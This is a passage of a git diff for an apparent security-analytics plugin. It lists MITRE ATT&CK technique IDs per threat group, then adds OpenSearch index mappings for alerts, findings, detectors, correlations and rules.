"intrusion-set--7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70": [ + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1176" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1040" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--b2e34388-6938-4c59-a702-80dc219e15e3": [ + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1595.003" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172": [ + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--090242d7-73fc-4738-af68-20162f7a5aae": [ + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1585" + } + ], + "intrusion-set--06a11b7e-2a36-47fe-8d3e-82c265df3258": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1583.004" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1036.003" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1027.005" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1136.002" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1550.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1003.002" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1584.004" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1584.006" + }, + { + "mitreAttackId": "attack.t1482" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1547.012" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1583.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1053" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1098.004" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.006" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--54dfec3e-6464-4f74-9d69-b7c817b7e5a3": [ + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1220" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1029" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1001.003" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1090.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--a0cb9370-e39b-44d5-9f50-ef78e412b973": [ + { + "mitreAttackId": "attack.t1553" + }, + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1584.005" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1546.008" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1566" + }, + { + "mitreAttackId": "attack.t1001.002" + }, + { + "mitreAttackId": "attack.t1583.003" + }, + { + "mitreAttackId": "attack.t1563.002" + }, + { + "mitreAttackId": "attack.t1583.002" + }, + { + "mitreAttackId": "attack.t1190" + } + ], + "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c": [ + { + "mitreAttackId": "attack.t1134.001" + }, + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1037.001" + }, + { + "mitreAttackId": "attack.t1528" + }, + { + "mitreAttackId": "attack.t1071.003" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1567" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1040" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1213.002" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1001.001" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1110.001" + }, + { + "mitreAttackId": "attack.t1598" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1030" + }, + { + "mitreAttackId": "attack.t1564.001" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1039" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1550.002" + }, + { + "mitreAttackId": "attack.t1550.001" + }, + { + "mitreAttackId": "attack.t1090.003" + }, + { + "mitreAttackId": "attack.t1090.002" + }, + { + "mitreAttackId": "attack.t1589.001" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1098.002" + }, + { + "mitreAttackId": "attack.t1025" + }, + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1137.002" + }, + { + "mitreAttackId": "attack.t1014" + }, + { + "mitreAttackId": "attack.t1573.001" + }, + { + "mitreAttackId": "attack.t1498" + }, + { + "mitreAttackId": "attack.t1213" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1546.015" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1211" + }, + { + "mitreAttackId": "attack.t1078.004" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1048.002" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1586.002" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1542.003" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1114.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1092" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1091" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--5ce5392a-3a6c-4e07-9df3-9b6a9159ac45": [ + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1027" + } + ], + "intrusion-set--9735c036-8ebe-47e9-9c77-b0ae656dab93": [ + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1095" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1574.001" + } + ], + "intrusion-set--f40eb8ce-2a74-4e56-89a1-227021410142": [ + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1218.007" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--c5947e1c-1cbc-434c-94b8-27c7e3be0fff": [ + { + "mitreAttackId": "attack.t1014" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf": [ + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1025" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1485" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1020" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1568" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1491.001" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.004" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1080" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1113" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1021.005" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1137" + }, + { + "mitreAttackId": "attack.t1534" + }, + { + "mitreAttackId": "attack.t1039" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1559.001" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1016.001" + } + ], + "intrusion-set--6fe8a2a1-a1b0-4af8-953d-4babd329f8f8": [ + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1588.004" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1588.003" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1036.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1053.002" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1055.012" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1070.005" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1030" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1195.002" + }, + { + "mitreAttackId": "attack.t1608.002" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1608.004" + }, + { + "mitreAttackId": "attack.t1190" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1562.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1548.002" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1021.006" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.002" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1555.005" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1003.002" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--6b9ebeb5-20bf-48b0-afb7-988d769a2f01": [ + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1187" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1588.002" + } + ] +} diff --git a/bin/main/mappings/alert_mapping.json b/bin/main/mappings/alert_mapping.json new file mode 100644 index 000000000..1d35d4744 --- /dev/null +++ b/bin/main/mappings/alert_mapping.json @@ -0,0 +1,157 @@ +{ + "dynamic": "strict", + "_routing": { + "required": true + }, + "_meta" : { + "schema_version": 4 + }, + "properties": { + "schema_version": { + "type": "integer" + }, + "monitor_id": { + "type": "keyword" + }, + "monitor_version": { + "type": "long" + }, + "id": { + "type": "keyword" + }, + "version": { + "type": "long" + }, + "severity": { + "type": "keyword" + }, + "monitor_name": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "monitor_user": { + "properties": { + "name": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "backend_roles": { + "type" : "text", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + }, + "roles": { + "type" : "text", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + }, + "custom_attribute_names": { + "type" : "text", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + } + } + }, + "trigger_id": { + "type": "keyword" + }, + "trigger_name": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "finding_ids": { + "type" : "text", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + }, + "related_doc_ids": { + "type" : "text", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + }, + "state": { + "type": "keyword" + }, + "start_time": { + "type": "date" + }, + "last_notification_time": { + "type": "date" + }, + "acknowledged_time": { + "type": "date" + }, + "end_time": { + "type": "date" + }, + "error_message": { + "type": "text" + }, + "alert_history": { + "type": "nested", + "properties": { + "timestamp": { + "type": "date" + }, + "message": { + "type": "text" + } + } + }, + "action_execution_results": { + "type": "nested", + "properties": { + "action_id": { + "type": "keyword" + }, + "last_execution_time": { + "type": "date" + }, + "throttled_count": { + "type": "integer" + } + } + }, + "agg_alert_content": { + "dynamic": true, + "properties": { + "parent_bucket_path": { + "type": "text" + }, + "bucket_key": { + "type": "text" + } + } + } + } +} diff --git a/bin/main/mappings/correlation-rules.json b/bin/main/mappings/correlation-rules.json new file mode 100644 index 000000000..877a62ce0 --- /dev/null +++ b/bin/main/mappings/correlation-rules.json @@ -0,0 +1,52 @@ +{ + "_meta" : { + "schema_version": 1 + }, + "properties": { + "name": { + "type": "text", + "analyzer" : "whitespace", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "correlate": { + "type": "nested", + "properties": { + "index": { + "type": "text", + "analyzer" : "whitespace", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "query": { + "type": "text", + "analyzer" : "whitespace", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "category": { + "type": "text", + "analyzer" : "whitespace", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + } + } + } + } +} diff --git a/bin/main/mappings/correlation.json b/bin/main/mappings/correlation.json new file mode 100644 index 000000000..5d7dd8867 --- /dev/null +++ b/bin/main/mappings/correlation.json @@ -0,0 +1,51 @@ +{ + "_meta" : { + "schema_version": 2 + }, + "properties": { + "root": { + "type": "boolean" + }, + "counter":{ + "type": "long" + }, + "finding1":{ + "type": "keyword" + }, + "finding2":{ + "type": "keyword" + }, + "corr_vector": { + "type": "sa_vector", + "dimension": 3, + "correlation_ctx": { + "similarityFunction": "EUCLIDEAN", + "parameters": { + "m": 16, + "ef_construction": 128 + } + } + }, + "timestamp":{ + "type": "long" + }, + "logType": { + "type": "keyword" + }, + "recordType": { + "type": "keyword" + }, + "scoreTimestamp": { + "type": "long" + }, + "corrRules": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + } + } +} diff --git a/bin/main/mappings/detector-settings.json b/bin/main/mappings/detector-settings.json new file mode 100644 index 000000000..c1dea5b45 --- /dev/null +++ b/bin/main/mappings/detector-settings.json @@ -0,0 +1,22 @@ +{ + "index": { + "hidden": true + }, + "analysis": { + "analyzer": { + "rule_analyzer": { + "tokenizer": "keyword", + "char_filter": [ + "rule_ws_filter" + ] + } + }, + "char_filter": { + "rule_ws_filter": { + "type": "pattern_replace", + "pattern": "(_ws_)", + "replacement": " " + } + } + } +} diff --git a/bin/main/mappings/detectors.json b/bin/main/mappings/detectors.json new file mode 100644 index 000000000..c4a42d53a --- /dev/null +++ b/bin/main/mappings/detectors.json @@ -0,0 +1,180 @@ +{ + "_meta" : { + "schema_version": 2 + }, + "properties": { + "detector": { + "type": "nested", + "dynamic": "false", + "properties": { + "name": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "detector_type": { + "type": "keyword" + }, + "user": { + "properties": { + "name": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "backend_roles": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "roles": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + }, + "custom_attribute_names": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword" + } + } + } + } + }, + "type": { + "type": "keyword" + }, + "enabled": { + "type": "boolean" + }, + "threat_intel_enabled": { + "type": "boolean" + }, + "enabled_time": { + "type": "date", + "format": "strict_date_time||epoch_millis" + }, + "last_update_time": { + "type": "date", + "format": "strict_date_time||epoch_millis" + }, + "alert_index": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "findings_index": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "workflow_ids": { + "type": "keyword" + }, + "rule_index": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "monitor_id": { + "type": "keyword" + }, + "schedule": { + "properties": { + "period": { + "properties": { + "interval": { + "type": "integer" + }, + "unit": { + "type": "keyword" + } + } + }, + "cron": { + "properties": { + "expression": { + "type": "text" + }, + "timezone": { + "type": "keyword" + } + } + } + } + }, + "inputs": { + "type": "nested", + "properties": { + "detector_input": { + "type": "nested", + "properties": { + "description": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "indices": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "custom_rules": { + "type": "nested", + "properties": { + "id": { + "type": "text" + } + } + }, + "pre_packaged_rules": { + "type": "nested", + "properties": { + "id": { + "type": "text" + } + } + } + } + } + } + } + } + } + } +} diff --git a/bin/main/mappings/finding_mapping.json b/bin/main/mappings/finding_mapping.json new file mode 100644 index 000000000..18faa22f6 --- /dev/null +++ b/bin/main/mappings/finding_mapping.json @@ -0,0 +1,68 @@ +{ + "dynamic": "strict", + "_meta" : { + "schema_version": 3 + }, + "properties": { + "schema_version": { + "type": "integer" + }, + "related_doc_ids": { + "type" : "text", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + }, + "monitor_id": { + "type": "keyword" + }, + "monitor_name": { + "type": "keyword" + }, + "id": { + "type": "keyword" + }, + "index": { + "type": "keyword" + }, + "queries" : { + "type": "nested", + "properties": { + "id": { + "type": "keyword" + }, + "name": { + "type": "keyword" + }, + "query": { + "type": "text" + }, + "tags": { + "type": "text", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + } + } + }, + "timestamp": { + "type": "long" + }, + "correlated_doc_ids": { + "type" : "text", + "analyzer": "whitespace", + "fields" : { + "keyword" : { + "type" : "keyword" + } + } + }, + "execution_id": { + "type": "keyword" + } + } +} diff --git a/bin/main/mappings/log_type_config_mapping.json b/bin/main/mappings/log_type_config_mapping.json new file mode 100644 index 000000000..431745a1c --- /dev/null +++ b/bin/main/mappings/log_type_config_mapping.json @@ -0,0 +1,80 @@ +{ + "_meta" : { + "schema_version": 2 + }, + "dynamic_templates": [ + { + "strings": { + "match_mapping_type": "string", + "mapping": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + } + } + } + ], + "properties": { + "raw_field": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "log_types": { + "type": "keyword" + }, + "name": { + "type": "text", + "analyzer": "whitespace", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "description": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "category": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "source": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "tags": { + "dynamic": true, + "properties": { + "correlation_id": { + "type": "integer" + } + } + } + } +} diff --git a/bin/main/mappings/rules.json b/bin/main/mappings/rules.json new file mode 100644 index 000000000..0db570049 --- /dev/null +++ b/bin/main/mappings/rules.json @@ -0,0 +1,124 @@ +{ + "_meta" : { + "schema_version": 1 + }, + "properties": { + "rule": { + "type": "nested", + "dynamic": "false", + "properties": { + "title": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "category": { + "type": "keyword" + }, + "log_source": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "description": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "tags": { + "type": "nested", + "properties": { + "value": { + "type": "text" + } + } + }, + "references": { + "type": "nested", + "properties": { + "value": { + "type": "text" + } + } + }, + "level": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "false_positives": { + "type": "nested", + "properties": { + "value": { + "type": "text" + } + } + }, + "author": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "status": { + "type": "text", + "fields": { + "keyword": { + "type": "keyword", + "ignore_above": 256 + } + } + }, + "last_update_time": { + "type": "date", + "format": "strict_date_time||epoch_millis" + }, + "queries": { + "type": 